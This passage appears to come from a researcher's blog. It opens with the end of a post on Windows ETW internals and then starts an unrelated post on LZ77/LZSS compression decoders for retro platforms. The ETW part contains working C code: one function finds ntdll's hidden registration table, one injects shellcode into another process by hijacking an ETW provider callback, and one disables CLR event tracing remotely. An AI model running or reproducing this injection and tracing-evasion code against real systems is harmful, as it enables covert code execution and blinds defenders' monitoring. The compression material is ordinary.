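    uint16_t RegIndex;
    uint16_t RegType;
    uint64_t Unknown[19];
} REG_ENTRY64;

/* Total size of the modelled entry. */
size_t reg_entry_size(void) {
    return sizeof(REG_ENTRY64);
}

/* Offset of the Callback pointer inside the modelled entry. */
size_t reg_callback_offset(void) {
    return offsetof(REG_ENTRY64, Callback);
}
```

    Under these assumptions the layout adds up to 256 bytes, with four bytes of compiler padding after RegType and the Callback pointer at offset 48.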

    3. Locating the Registration Table

    A number of functions reference it, but none are public.

    • EtwpRemoveRegistrationFromTable
    • EtwpGetNextRegistration
    • EtwpFindRegistration
    • EtwpInsertRegistration

    Since we know the type of structures to look for in memory, a good old brute force search of the .data section in ntdll.dll is enough to find it.

    LPVOID etw_get_table_va(VOID) {
        LPVOID                m, va = NULL;
        PIMAGE_DOS_HEADER     dos;
        PIMAGE_NT_HEADERS     nt;
        PIMAGE_SECTION_HEADER sh;
        DWORD                 i, cnt = 0;
        PULONG_PTR            ds = NULL;
        PRTL_RB_TREE          rbt;
        PETW_USER_REG_ENTRY   re;
        
        m   = GetModuleHandle(L"ntdll.dll");
        dos = (PIMAGE_DOS_HEADER)m;  
        nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);  
        sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
                nt->FileHeader.SizeOfOptionalHeader);
        
        // locate the .data segment, save VA and number of pointers
        // (only the first four bytes of the section name are compared)
        for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
          if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
            ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
            cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
            break;
          }
        }
        
        // bail out if the section wasn't found
        if(ds == NULL || cnt == 0) return NULL;
        
        // For each pointer minus one
        for(i=0; i<cnt - 1; i++) {
          rbt = (PRTL_RB_TREE)&ds[i];
          // Skip pointers that aren't heap memory
          if(!IsHeapPtr(rbt->Root)) continue;
          
          // It might be the registration table.
          // Check if the callback is code
          re = (PETW_USER_REG_ENTRY)rbt->Root;
          if(!IsCodePtr(re->Callback)) continue;
          
          // Save the virtual address and exit loop
          va = &ds[i];
          break;
        }
        return va;
    }
    

    4. Parsing the Registration Table

    ETW Dump can display information about each ETW provider in the registration table of one or more processes. The name of a provider (with the exception of private providers) is obtained using ITraceDataProvider::get_DisplayName. This method uses the Trace Data Helper API, which internally queries WMI.

    Node        : 00000267F0961D00
    GUID        : {E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4} (.NET Common Language Runtime)
    Description : Microsoft .NET Runtime Common Language Runtime - WorkStation
    Callback    : 00007FFC7AB4B5D0 : clr!McGenControlCallbackV2
    Context     : 00007FFC7B0B3130 : clr!MICROSOFT_WINDOWS_DOTNETRUNTIME_PROVIDER_Context
    Index       : 108
    Reg Handle  : 006C0267F0961D00
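
    The Reg Handle in the dump above follows directly from the Node and Index values. A minimal sketch of the arithmetic in portable C; the function names are made up for illustration and are not part of any Windows API.

```c
#include <assert.h>
#include <stdint.h>

/* Combine an entry address and a table index into a registration handle:
   the index occupies the top 16 bits, the address the low 48 bits. */
uint64_t reg_handle_make(uint64_t node, uint16_t index) {
    assert((node >> 48) == 0);   /* the address must fit in 48 bits */
    return node | ((uint64_t)index << 48);
}

/* Recover the entry address from a registration handle. */
uint64_t reg_handle_node(uint64_t handle) {
    return handle & 0x0000FFFFFFFFFFFFULL;
}

/* Recover the table index from a registration handle. */
uint16_t reg_handle_index(uint64_t handle) {
    return (uint16_t)(handle >> 48);
}
```

    With the values from the dump, reg_handle_make(0x00000267F0961D00, 108) yields 0x006C0267F0961D00, since 108 is 0x6C.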
    

    5. Code Redirection

    The callback function for a provider is invoked at the request of the kernel to enable or disable tracing. For the CLR, the relevant function is clr!McGenControlCallbackV2. Code redirection is achieved by simply replacing the callback address with the address of a new callback. Of course, it must use the same prototype, otherwise the host process will crash once the callback finishes executing. We can invoke a new callback using the StartTrace and EnableTraceEx API, although there may be a simpler way via NtTraceControl.

    // inject shellcode into process using ETW registration entry
    BOOL etw_inject(DWORD pid, PWCHAR path, PWCHAR prov) {
        RTL_RB_TREE             tree;
        PVOID                   etw, pdata, cs, callback;
        HANDLE                  hp;
        SIZE_T                  rd, wr;
        ETW_USER_REG_ENTRY      re;
        PRTL_BALANCED_NODE      node;
        OLECHAR                 id[40];
        TRACEHANDLE             ht;
        DWORD                   plen, bufferSize;
        PWCHAR                  name;
        PEVENT_TRACE_PROPERTIES prop;
        BOOL                    status = FALSE;
        const wchar_t           etwname[]=L"etw_injection\0";
        
        if(path == NULL) return FALSE;
        
        // try read shellcode into memory
        plen = readpic(path, &pdata);
        if(plen == 0) { 
          wprintf(L"ERROR: Unable to read shellcode from %s\n", path); 
          return FALSE; 
        }
        
        // try obtain the VA of ETW registration table
        etw = etw_get_table_va();
        
        if(etw == NULL) {
          wprintf(L"ERROR: Unable to obtain address of ETW Registration Table.\n");
          return FALSE;
        }
        
        printf("*********************************************\n");
        printf("EtwpRegistrationTable for %i found at %p\n", pid, etw);  
        
        // try open target process
        hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
        
        if(hp == NULL) {
          xstrerror(L"OpenProcess(%ld)", pid);
          return FALSE;
        }
        
        // use (Microsoft-Windows-User-Diagnostic) unless specified
        
        node = etw_get_reg(
          hp, 
          etw, 
          prov != NULL ? prov : L"{305FC87B-002A-5E26-D297-60223012CA9C}", 
          &re);
        
        if(node != NULL) {
          // convert GUID to string and display name
          // (the last argument is a character count, not a byte count)
          StringFromGUID2(&re.ProviderId, id, sizeof(id) / sizeof(id[0]));
          name = etw_id2name(id);
            
          wprintf(L"Address of remote node  : %p\n", (PVOID)node);
          wprintf(L"Using %s (%s)\n", id, name);
          
          // allocate memory for shellcode
          cs = VirtualAllocEx(
            hp, NULL, plen, 
            MEM_COMMIT | MEM_RESERVE, 
            PAGE_EXECUTE_READWRITE);
            
          if(cs != NULL) {
            wprintf(L"Address of old callback : %p\n", re.Callback);
            wprintf(L"Address of new callback : %p\n", cs);
            
            // write shellcode
            WriteProcessMemory(hp, cs, pdata, plen, &wr);
              
            // initialize trace
            bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + 
                         sizeof(etwname) + 2;
    
            prop = (EVENT_TRACE_PROPERTIES*)LocalAlloc(LPTR, bufferSize);
            prop->Wnode.BufferSize    = bufferSize;
            prop->Wnode.ClientContext = 2;
            prop->Wnode.Flags         = WNODE_FLAG_TRACED_GUID;
            prop->LogFileMode         = EVENT_TRACE_REAL_TIME_MODE;
            prop->LogFileNameOffset   = 0;
            prop->LoggerNameOffset    = sizeof(EVENT_TRACE_PROPERTIES);
            
            if(StartTrace(&ht, etwname, prop) == ERROR_SUCCESS) {
              // save callback
              callback = re.Callback;
              re.Callback = cs;
              
              // overwrite existing entry with shellcode address
              WriteProcessMemory(hp, 
                (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback), 
                &cs, sizeof(ULONG_PTR), &wr);
              
              // trigger execution of shellcode by enabling trace
              if(EnableTraceEx(
                &re.ProviderId, NULL, ht,
                1, TRACE_LEVEL_VERBOSE, 
                (1 << 16), 0, 0, NULL) == ERROR_SUCCESS) 
              {
                status = TRUE;
              }
              
              // restore callback
              WriteProcessMemory(hp, 
                (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback), 
                &callback, sizeof(ULONG_PTR), &wr);
    
              // disable tracing
              ControlTrace(ht, etwname, prop, EVENT_TRACE_CONTROL_STOP);
            } else {
              xstrerror(L"StartTrace");
            }
            LocalFree(prop);
            // MEM_RELEASE must not be combined with MEM_DECOMMIT
            VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
          }        
        } else {
          wprintf(L"ERROR: Unable to get registration entry.\n");
        }
        CloseHandle(hp);
        return status;
    }
    

    6. Disable Tracing

    If you decide to examine clr!McGenControlCallbackV2 in more detail, you’ll see that it changes values in the callback context to enable or disable event tracing. For CLR, the following structure and function are used. Again, this may be defined differently for different versions of the CLR.

    typedef struct _MCGEN_TRACE_CONTEXT {
        TRACEHANDLE      RegistrationHandle;
        TRACEHANDLE      Logger;
        ULONGLONG        MatchAnyKeyword;
        ULONGLONG        MatchAllKeyword;
        ULONG            Flags;
        ULONG            IsEnabled;
        UCHAR            Level;
        UCHAR            Reserve;
        USHORT           EnableBitsCount;
        PULONG           EnableBitMask;
        const ULONGLONG* EnableKeyWords;
        const UCHAR*     EnableLevel;
    } MCGEN_TRACE_CONTEXT, *PMCGEN_TRACE_CONTEXT;
    
    void McGenControlCallbackV2(
      LPCGUID              SourceId, 
      ULONG                IsEnabled, 
      UCHAR                Level, 
      ULONGLONG            MatchAnyKeyword, 
      ULONGLONG            MatchAllKeyword, 
      PVOID                FilterData, 
      PMCGEN_TRACE_CONTEXT CallbackContext) 
    {
      int cnt;
      
      // if we have a context
      if(CallbackContext) {
        // and control code is not zero
        if(IsEnabled) {
          // enable tracing?
          if(IsEnabled == EVENT_CONTROL_CODE_ENABLE_PROVIDER) {
            // set the context
            CallbackContext->MatchAnyKeyword = MatchAnyKeyword;
            CallbackContext->MatchAllKeyword = MatchAllKeyword;
            CallbackContext->Level           = Level;
            CallbackContext->IsEnabled       = 1;
            
            // ...other code omitted...
          }
        } else {
          // disable tracing
          CallbackContext->IsEnabled       = 0;
          CallbackContext->Level           = 0;
          CallbackContext->MatchAnyKeyword = 0;
          CallbackContext->MatchAllKeyword = 0;
          
          if(CallbackContext->EnableBitsCount > 0) {
            
            ZeroMemory(CallbackContext->EnableBitMask,
              4 * ((CallbackContext->EnableBitsCount - 1) / 32 + 1));
          }
        }
        EtwCallback(
          SourceId, IsEnabled, Level, 
          MatchAnyKeyword, MatchAllKeyword, 
          FilterData, CallbackContext);
      }
    }
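
    The size passed to ZeroMemory in the disable branch rounds EnableBitsCount up to whole 32-bit words. A small sketch of that arithmetic in portable C; enable_mask_bytes is a hypothetical helper name used only for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Number of bytes covering `bits` enable bits when the bit mask is
   stored as an array of 32-bit words, mirroring the expression
   4 * ((EnableBitsCount - 1) / 32 + 1) from the function above. */
uint32_t enable_mask_bytes(uint16_t bits) {
    assert(bits > 0);   /* the original only clears the mask when the count is positive */
    return 4u * (((uint32_t)bits - 1u) / 32u + 1u);
}
```

    For example, 1 to 32 bits need one word (4 bytes), while 33 bits already need two words (8 bytes).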
    

    There are a number of options to disable CLR logging that don’t require patching code.

    • Invoke McGenControlCallbackV2 using EVENT_CONTROL_CODE_DISABLE_PROVIDER.
    • Directly modify the MCGEN_TRACE_CONTEXT and ETW registration structures to prevent further logging.
    • Invoke EventUnregister passing in the registration handle.

    The simplest way is passing the registration handle to ntdll!EtwEventUnregister. The following is just a PoC.

    BOOL etw_disable(
        HANDLE             hp,
        PRTL_BALANCED_NODE node,
        USHORT             index) 
    {
        HMODULE               m;
        HANDLE                ht;
        RtlCreateUserThread_t pRtlCreateUserThread;
        CLIENT_ID             cid;
        NTSTATUS              nt=~0UL;
        REGHANDLE             RegHandle;
        EventUnregister_t     pEtwEventUnregister;
        ULONG                 Result;
        
        // resolve address of API for creating new thread
        m = GetModuleHandle(L"ntdll.dll");
        pRtlCreateUserThread = (RtlCreateUserThread_t)
            GetProcAddress(m, "RtlCreateUserThread");
        
        // create registration handle    
        RegHandle           = (REGHANDLE)((ULONG64)node | (ULONG64)index << 48);
        pEtwEventUnregister = (EventUnregister_t)GetProcAddress(m, "EtwEventUnregister");
    
        // execute payload in remote process
        printf("  [ Executing EventUnregister in remote process.\n");
        nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL, 
          NULL, pEtwEventUnregister, (PVOID)RegHandle, &ht, &cid);
    
        printf("  [ NTSTATUS is %lx\n", nt);
        WaitForSingleObject(ht, INFINITE);
        
        // read result of EtwEventUnregister
        GetExitCodeThread(ht, &Result);
        CloseHandle(ht);
        
        SetLastError(Result);
        
        if(Result != ERROR_SUCCESS) {
          xstrerror(L"etw_disable");
          return FALSE;
        }
        disabled_cnt++; 
        return TRUE;
    }
    

    7. Further Research

    I may have missed articles/tools on ETW. Feel free to email me with the details.

    Shellcode: Recycling Compression Algorithms for the Z80, 8088, 6502, 8086, and 68K Architectures.

    By: odzhan
    27 May 2020 at 01:00

    Contents

    1. Introduction
    2. History
    3. Entropy Coding
    4. Universal code
    5. Lempel-Ziv (LZ77/LZ1)
    6. Lempel-Ziv-Storer-Szymanski (LZSS)
    7. Lempel-Ziv-Bell (LZB)
    8. Intel 8088 / 8086
      1. LZE
      2. LZ4
      3. LZSA
      4. aPLib
    9. MOS Technology 6502
      1. Exomizer
      2. Pucrunch
    10. Zilog 80
      1. Mega LZ
      2. ZX7
      3. ZX7 Mini
      4. LZF
    11. Motorola 68000
      1. PackFire
      2. Shrinkler
    12. C/x86 ASM
      1. Lempel-Ziv Ross Williams (LZRW)
      2. Ultra-fast LZ (ULZ)
      3. BriefLZ
      4. Not Really Vanished (NRV)
      5. Lempel–Ziv–Markov Algorithm (LZMA)
      6. Lempel–Ziv–Oberhumer-Markov Algorithm (LZOMA)
      7. KKrunchy
    13. Results
    14. Summary
    15. Acknowledgements
    16. Further Research
      1. Documentaries and Interviews
      2. Websites, Blogs and Forums
      3. Demoscene Productions
      4. Tools
      5. Other Compression Algorithms

    1. Introduction

    My last post about compression inadvertently missed algorithms used by the Demoscene, an omission I attempt to correct here. Except for research by Introspec about various 8-Bit algorithms on the ZX Spectrum, it’s tricky to find information in one location about compression used in Demoscene productions. The focus here will be on variations of the Lempel-Ziv (LZ) scheme published in 1977 that are suitable for resource-constrained environments such as 8, 16, and 32-bit home computers released in the 1980s. In executable compression, we can consider LZ an umbrella term for LZ77, LZSS, LZB, LZH, LZARI, and any other algorithms inspired by those designs.

    Many variations of LZ surfaced in the past thirty years, and a detailed description of them all would be quite useful for historical reference. However, the priority for this post is exploring algorithms with the best ratios that also use the least amount of code possible for decompression. Considerations include an open-source compressor and the speed of compression and decompression. However, some decoders without sources for a compressor are also useful to show the conversion between architectures.

    Drop me an email if you would like to provide feedback on this post. x86 assembly code for some of the algorithms discussed here may be found here.

    2. History

    “Designing a compression format requires trade-offs, such as compression ratio, compression speed, decompression speed, code complexity, code size, memory usage, etc. For executable compression in particular, where the sum of decompression code size and compressed size is what counts, the optimal balance between these two depends on the intended target size.”

    Aske Simon Christensen, author of Shrinkler and co-author of Crinkler.

    Since the invention of telegraphy, telephony, and especially television, engineers have sought ways to reduce the bandwidth required for transmitting electrical signals. Before the invention of analog-to-digital converters and entropy coding methods in the 1950s, compaction of television signals required reducing the quality of the video before transmission, a technique that’s referred to as lossy compression. Many publications on compressing television signals surfaced between the 1950s-1970s, and these eventually proved to be useful in other applications, most notably for the aerospace industry.

    For example, various interplanetary spacecraft launched in the 1960s could record data faster than they could transmit it to Earth. Following a review of unclassified space missions in the early 1960s, in particular the Mariner Mars mission of 1964, NASA’s Jet Propulsion Laboratory examined various compression methods for acquiring images in space. The first unclassified spacecraft to use image compression was Explorer 34 or Interplanetary Monitoring Platform 4 (IMP-4), launched in 1967. It used chroma subsampling, invented in the 1950s specifically for color television. This method, which eventually became part of the JPEG standard, would continue being used by NASA until the invention of a more optimal encoding method called Discrete Cosine Transform (DCT).

    The increase of computer mainframes in the 1950s and the collection of data on citizens for social science motivated prior research and development of lossless compression techniques. Microprocessors became inexpensive in the late 1970s, leading the way for average consumers to purchase a computer of their own. However, this didn’t immediately reduce the cost of disk storage. And the vast majority of user data remained stored on magnetic tapes or floppy diskettes rather than hard disk drives offered only as an optional component.

    Hard disk drives remained expensive between 1980-2000, encouraging the development of tools to reduce the size of files. The first program to compress executables on the PC was Realia Spacemaker, which was written by Robert Dewar and published in 1982. The precise algorithm used by this program remains undocumented. However, the year of publication would suggest it uses Run-length encoding (RLE). Qkumba informed me about two things via email. First, games for the Apple II used RLE in the early 1980s for shrinking images used as title screens. Examples include Beach-Head, G.I. Joe and Black Magic, to name a few. Second, games by Infocom used Huffman-like text compression. Microsoft EXEPACK, written by Reuben Borman and published in 1985, also used RLE for compression.

    Haruhiko Okumura uploaded an implementation of the LZSS compression algorithm to a Bulletin Board System (BBS) in 1988. Inspired by Okumura, Fabrice Bellard published LZEXE in 1989, which appears to be the first executable compressor to use LZSS.

    3. Entropy Coding

    Samuel Morse published his coding system for the electrical telegraph in 1838. It assigned short symbols for the most common letters of an alphabet, and this may be the first example of compression used for electrical signals. An entropy coder works similarly. It removes redundancy by assigning short codewords for symbols occurring more frequently and longer codewords for symbols with less frequency. The following table lists some examples.

    Type | Publication and Author
    Shannon | A Mathematical Theory of Communication published in 1948 by Claude E. Shannon.
    Huffman | A Method for the Construction of Minimum Redundancy Codes published in 1952 by David A. Huffman.
    Arithmetic | Generalized Kraft Inequality and Arithmetic Coding published in 1976 by Jorma Rissanen.
    Range | There are two papers of interest here. One is Source Coding Algorithms for Fast Data Compression published in 1976 by Richard Clark Pasco. The other is Range encoding: An Algorithm for Removing Redundancy from a Digitised Message published in 1979 by G.N.N. Martin.
    ANS | Asymmetric Numeral Systems: Entropy Coding Combining Speed of Huffman Coding with Compression Rate of Arithmetic Coding published in 2014 by Jarosław Duda.

    Arithmetic or range coders fused with an LZ77-style compressor result in high compression ratios and compact decompressors, which makes them attractive to the demoscene. They are slower than a Huffman coder, but achieve a noticeably better compression ratio. ANS is the favored coder used in mission-critical systems today because it combines a compression ratio close to arithmetic coding with speed close to Huffman coding.
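
    To make the idea of shorter codewords for more frequent symbols concrete, here is a minimal sketch that computes Shannon code lengths, i.e. the smallest L with count * 2^L >= total, using integer arithmetic only. The function names are hypothetical and not taken from any of the papers listed above, and a real entropy coder would go on to assign actual codewords.

```c
#include <assert.h>
#include <stdint.h>

// Shannon code length for a symbol seen `count` times out of `total`:
// the smallest L such that count * 2^L >= total, i.e. ceil(log2(total/count)).
static uint32_t shannon_length(uint32_t count, uint32_t total) {
    assert(count > 0 && count <= total);
    uint32_t len = 0;
    while (((uint64_t)count << len) < total) len++;
    return len;
}

// Total number of bits needed to code a message with the given symbol counts.
static uint32_t shannon_total_bits(const uint32_t *counts, uint32_t n) {
    uint32_t total = 0, bits = 0;
    for (uint32_t i = 0; i < n; i++) total += counts[i];
    for (uint32_t i = 0; i < n; i++)
        if (counts[i]) bits += counts[i] * shannon_length(counts[i], total);
    return bits;
}
```

    For the 11-letter string "abracadabra" the counts are a=5, b=2, r=2, c=1 and d=1, which gives lengths of 2, 3, 3, 4 and 4 bits and a total of 30 bits instead of 88 bits at one byte per letter.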

    4. Universal Code

    There are many variable-length coding methods used for integers of arbitrary upper bound, and most of the algorithms presented in this post use Elias gamma coding for the offset and length of a match reference. The following table contains a list of papers referenced in Punctured Elias Codes for variable-length coding of the integers published by Peter Fenwick in 1996.

    Coding | Author and publication
    Golomb | Run-length encodings published in 1966 by Solomon W. Golomb.
    Levenshtein | On the redundancy and delay of separable codes for the natural numbers published in 1968 by Vladimir I. Levenshtein.
    Elias | Universal Codeword Sets and Representations of the Integers published in 1975 by Peter Elias.
    Rodeh-Even | Economical Encoding of Commas Between Strings published in 1978 by Michael Rodeh and Shimon Even.
    Rice | Some Practical Universal Noiseless Coding Techniques published in 1979 by Robert F. Rice.
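
    As a rough illustration of Elias gamma coding in its textbook form, the sketch below writes N zero bits followed by the N+1 significant bits of the value, most significant bit first. The bitio structure and all function names are assumptions made for this example; the decoders in this post read their bits from a small queue and some interleave data and continuation bits instead. There are no bounds checks.

```c
#include <assert.h>
#include <stdint.h>

typedef struct { uint8_t *buf; uint32_t pos; } bitio;  // pos counts bits

static void put_bit(bitio *b, int bit) {
    if ((b->pos & 7) == 0) b->buf[b->pos >> 3] = 0;     // clear each new byte
    if (bit) b->buf[b->pos >> 3] |= (uint8_t)(0x80 >> (b->pos & 7));
    b->pos++;
}

static int get_bit(bitio *b) {
    int bit = (b->buf[b->pos >> 3] >> (7 - (b->pos & 7))) & 1;
    b->pos++;
    return bit;
}

// Elias gamma: N zero bits, then the N+1 significant bits of value.
static void gamma_encode(bitio *b, uint32_t value) {
    assert(value >= 1);                    // zero has no gamma code
    int n = 0;
    while ((value >> n) > 1) n++;          // n = floor(log2(value))
    for (int i = 0; i < n; i++) put_bit(b, 0);
    for (int i = n; i >= 0; i--) put_bit(b, (int)((value >> i) & 1));
}

static uint32_t gamma_decode(bitio *b) {
    int n = 0;
    while (get_bit(b) == 0) n++;           // count the leading zeros
    uint32_t value = 1;                    // the 1 bit that ended the run
    while (n--) value = (value << 1) | (uint32_t)get_bit(b);
    return value;
}
```

    Small values are cheap: 1 takes one bit and 5 takes five bits (00101), while 300 takes seventeen. That suits match lengths and offsets, where small numbers dominate.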

    5. Lempel-Ziv (LZ77/LZ1)

    Designed by Abraham Lempel and Jacob Ziv and described in A Universal Algorithm for Sequential Data Compression published in 1977. It compresses files by searching for the repetition of strings or sequences of bytes and storing a reference pointer and length to an earlier occurrence. The sizes of the reference pointer and length determine both the speed of compression and the compression ratio. The following decoder uses a 12-Bit reference pointer (offsets of up to 4095 bytes, since an offset of zero marks a token without a match) and a 4-Bit length (1 to 16 bytes). It will work with a compressor written by Andy Herbert. However, you must change the compressor to use 16-bits for a match reference. Charles Bloom discusses small LZ decoders in a blog post that may be of interest to readers.

    uint32_t lz77_depack(
      void *outbuf, 
      uint32_t outlen, 
      const void *inbuf) 
    {
        uint32_t ofs, len;
        uint8_t  *in, *out, *end, *ptr;
        
        in  = (uint8_t*)inbuf;
        out = (uint8_t*)outbuf;
        end = out + outlen;
        
        while(out < end) {
          len = *(uint16_t*)in;
          in += 2;
          ofs = len >> 4; 
          
          // offset?
          if(ofs) {
            // copy reference
            len = (len & 15) + 1;
            ptr = out - ofs;
            while(len--) *out++ = *ptr++;
          }
          // copy literal
          *out++ = *in++;
        }
        // return depacked length
        return (out - (uint8_t*)outbuf);
    }
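
    To show what the decoder above expects as input, here is a sketch of a brute-force packer for the same token layout: a 16-bit token holding (offset << 4) | (length - 1), followed by one literal byte. This is not Andy Herbert's compressor; lz77_pack is a hypothetical name, and the decoder is repeated (with memcpy for the unaligned 16-bit read) only so the example stands alone. The output buffer needs room for up to three bytes per input byte.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

static uint32_t lz77_pack(uint8_t *out, const uint8_t *in, uint32_t inlen) {
    uint32_t pos = 0, n = 0;

    while (pos < inlen) {
        uint32_t best_len = 0, best_ofs = 0;
        uint32_t max_ofs = pos < 4095 ? pos : 4095;
        // every token is followed by a literal, so keep one byte back for it
        uint32_t max_len = inlen - pos - 1 < 16 ? inlen - pos - 1 : 16;

        // brute-force search of the window for the longest match
        for (uint32_t ofs = 1; ofs <= max_ofs; ofs++) {
            uint32_t len = 0;
            while (len < max_len && in[pos - ofs + len] == in[pos + len]) len++;
            if (len > best_len) { best_len = len; best_ofs = ofs; }
        }
        uint16_t token = 0;                 // offset 0 means "no match"
        if (best_len) {
            assert(best_ofs >= 1 && best_ofs <= 4095);
            token = (uint16_t)((best_ofs << 4) | (best_len - 1));
        }
        memcpy(out + n, &token, 2);         // host byte order, as the decoder reads it
        n += 2;
        pos += best_len;
        out[n++] = in[pos++];               // literal that follows every token
    }
    return n;
}

// The decoder from the post, repeated so the sketch compiles on its own.
static uint32_t lz77_depack(void *outbuf, uint32_t outlen, const void *inbuf) {
    const uint8_t *in = (const uint8_t *)inbuf;
    uint8_t *out = (uint8_t *)outbuf, *end = out + outlen;

    while (out < end) {
        uint16_t token;
        memcpy(&token, in, 2);
        in += 2;
        uint32_t ofs = token >> 4;
        if (ofs) {                          // copy reference
            uint32_t len = (token & 15u) + 1;
            const uint8_t *ptr = out - ofs;
            while (len--) *out++ = *ptr++;
        }
        *out++ = *in++;                     // copy literal
    }
    return (uint32_t)(out - (uint8_t *)outbuf);
}
```

    Because a token precedes every literal, data without repetition grows to three times its size, which is the weakness LZSS addresses.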
    

    The assembly is optimized for size, currently at 54 bytes.

    lz77_depack:
    _lz77_depack:
        pushad
        
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax           ; edi = outbuf
        lodsd
        lea    ebx, [eax+edi]     ; ebx = outlen + outbuf
        lodsd
        xchg   esi, eax           ; esi = inbuf
        xor    eax, eax
    lz77_main:
        cmp    edi, ebx           ; while (out < end)
        jnb    lz77_exit
        
        lodsw                     ; ofs = *(uint16_t*)in;
        movzx  ecx, al            ; len = ofs & 255; (masked to 4 bits below)
        shr    eax, 4             ; ofs >>= 4;
        jz     lz77_copybyte
        
        and    ecx, 15
        inc    ecx                ; len++;
        push   esi
        mov    esi, edi           ; ptr = out - ofs;
        sub    esi, eax           
        rep    movsb              ; while(len--) *out++ = *ptr++;
        pop    esi
    lz77_copybyte:
        movsb                     ; *out++ = *in++;
        jmp    lz77_main
    lz77_exit:
        ; return (out - (uint8_t*)outbuf);
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
        
    

    6. Lempel-Ziv-Storer-Szymanski (LZSS)

    Designed by James Storer and Thomas Szymanski and described in Data Compression via Textual Substitution published in 1982. The match reference in the LZ77 decoder occupies 16-bits or two bytes even when no match exists. That means every literal carries two additional redundant bytes, which isn’t very efficient. LZSS improves the LZ77 format by using one bit to distinguish between a match reference and a literal, and this improves the overall compression ratio. Introspec informed me via email of the importance of this paper in describing the many variations of the original LZ77 scheme, many of which remain unexplored. It also has an overview of the early literature, which is worth examining in more detail. Haruhiko Okumura shared his implementations of LZSS via a BBS in 1988, and this inspired the development of various executable compressors released in the late 1980s and 1990s. The following decoder works with a compressor by Sebastian Steinhauer.

    // to keep track of flags
    typedef struct _lzss_ctx_t {
        uint8_t w;
        uint8_t *in;
    } lzss_ctx;
    
    // read a bit
    uint8_t get_bit(lzss_ctx *c) {
        uint8_t x;
        
        x = c->w;
        c->w <<= 1;
        
        if(c->w == 0) {
          x = *c->in++;
          c->w = (x << 1) | 1;
        }
        return x >> 7;
    }
    
    uint32_t lzss_depack(
      void *outbuf, 
      uint32_t outlen, 
      const void *inbuf) 
    {
        uint8_t  *out, *end, *ptr;
        uint32_t i, ofs, len;
        lzss_ctx c;
        
        // initialize pointers
        out = (uint8_t*)outbuf;
        end = out + outlen;
        
        // initialize context
        c.in = (uint8_t*)inbuf;
        c.w  = 128;
        
        while(out < end) {
          // if bit is not set
          if(!get_bit(&c)) {
            // store literal
            *out++ = *c.in++;
          } else {
            // decode offset and length
            ofs = *(uint16_t*)c.in;
            c.in += 2;
            len = (ofs & 15) + 3;
            ofs >>= 4;
            ptr = out - ofs - 1;
            // copy bytes
            while(len--) *out++ = *ptr++;
          }
        }
        // return length
        return (out - (uint8_t*)outbuf);
    }
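
    The stream layout the decoder above reads can be sketched from the other side with a brute-force packer. This is not Sebastian Steinhauer's compressor; lzss_pack is a hypothetical name, and the decoder is repeated (with memcpy for the 16-bit read) only so the example is self-contained. The output buffer needs room for inlen plus one flag byte per eight items.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

// One flag bit per item (0 = literal, 1 = match); a match is stored as a
// 16-bit pair ((distance - 1) << 4) | (length - 3).
static uint32_t lzss_pack(uint8_t *out, const uint8_t *in, uint32_t inlen) {
    uint32_t pos = 0, n = 0, flag_pos = 0, bits = 0;

    while (pos < inlen) {
        // the decoder fetches a flag byte just before the first of the
        // eight items it describes, so reserve it at that point
        if (bits == 0) { flag_pos = n; out[n++] = 0; }

        uint32_t best_len = 0, best_dist = 0;
        uint32_t max_dist = pos < 4096 ? pos : 4096;
        uint32_t max_len  = inlen - pos < 18 ? inlen - pos : 18;

        // brute-force search for the longest earlier occurrence
        for (uint32_t dist = 1; dist <= max_dist; dist++) {
            uint32_t len = 0;
            while (len < max_len && in[pos - dist + len] == in[pos + len]) len++;
            if (len > best_len) { best_len = len; best_dist = dist; }
        }
        if (best_len >= 3) {
            assert(best_dist >= 1 && best_dist <= 4096);
            uint16_t pair = (uint16_t)(((best_dist - 1) << 4) | (best_len - 3));
            out[flag_pos] |= (uint8_t)(0x80 >> bits);  // flag bits go MSB first
            memcpy(out + n, &pair, 2);                 // host byte order
            n += 2;
            pos += best_len;
        } else {
            out[n++] = in[pos++];                      // flag bit stays 0
        }
        bits = (bits + 1) & 7;
    }
    return n;
}

// Decoder from the post, repeated so the sketch stands alone.
typedef struct { uint8_t w; const uint8_t *in; } lzss_ctx;

static uint8_t get_bit(lzss_ctx *c) {
    uint8_t x = c->w;
    c->w = (uint8_t)(c->w << 1);
    if (c->w == 0) {
        x = *c->in++;
        c->w = (uint8_t)((x << 1) | 1);
    }
    return x >> 7;
}

static uint32_t lzss_depack(void *outbuf, uint32_t outlen, const void *inbuf) {
    uint8_t *out = (uint8_t *)outbuf, *end = out + outlen;
    lzss_ctx c = { 128, (const uint8_t *)inbuf };

    while (out < end) {
        if (!get_bit(&c)) {
            *out++ = *c.in++;                          // literal
        } else {
            uint16_t pair;
            memcpy(&pair, c.in, 2);
            c.in += 2;
            uint32_t len = (pair & 15u) + 3;
            const uint8_t *ptr = out - (pair >> 4) - 1;
            while (len--) *out++ = *ptr++;
        }
    }
    return (uint32_t)(out - (uint8_t *)outbuf);
}
```

    A literal now costs nine bits instead of twenty-four, and a match must cover at least three bytes before it pays for its two-byte pair.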
    

    The assembly is a straightforward translation of the C code, currently at 69 bytes.

    lzss_depackx:
    _lzss_depackx:
        pushad
        
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax          ; edi = outbuf
        lodsd
        lea    ebx, [edi+eax]    ; ebx = edi + outlen
        lodsd
        xchg   esi, eax          ; esi = inbuf
        mov    al, 128           ; set flags
    lzss_main:
        cmp    edi, ebx          ; while(out < end)
        jnb    lzss_exit
        
        add    al, al            ; c->w <<= 1
        jnz    lzss_check_bit
        
